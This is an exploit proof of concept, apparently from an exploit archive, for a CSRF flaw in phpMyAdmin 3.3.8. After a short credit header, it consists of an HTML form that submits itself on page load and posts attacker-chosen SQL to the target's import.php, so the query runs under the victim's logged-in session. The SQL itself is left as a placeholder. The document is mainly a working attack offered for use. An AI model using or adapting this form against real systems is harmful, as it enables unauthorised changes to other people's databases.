<!--
_
___ _ __ | |_ _ __ _
/ __| '_ \| | | | |/ _` |
\__ \ |_) | | |_| | (_| |
|___/ .__/|_|\__,_|\__,_|
|_|
[+] Exploit Title : [0-day]phpMyAdmin 3.3.8 CSRF sql code execution
[+] Software Link: http://www.phpmyadmin.net/home_page/downloads.php
[+] Tested on: phpMyAdmin 3.3.8
[~] Authors : Gabry9191 - Foth - Vaghy -> Splua Hack Crew
[~] Bug hunted by : Gabry9191
[~] Date : 4/11/2010
-->
<form name="sqlform" id="sqlqueryform" enctype="multipart/form-data" action="https://[WEBSITE]/[phpMyAdmin Directory]/import.php" method="post">
<textarea rows="0" cols="0" id="sqlquery" name="sql_query">
Sql Code To Injecting
</textarea>
<input type="submit" value="Esegui" name="SQL">
</form>
<script>document.body.onload = document.forms[0].submit();</script>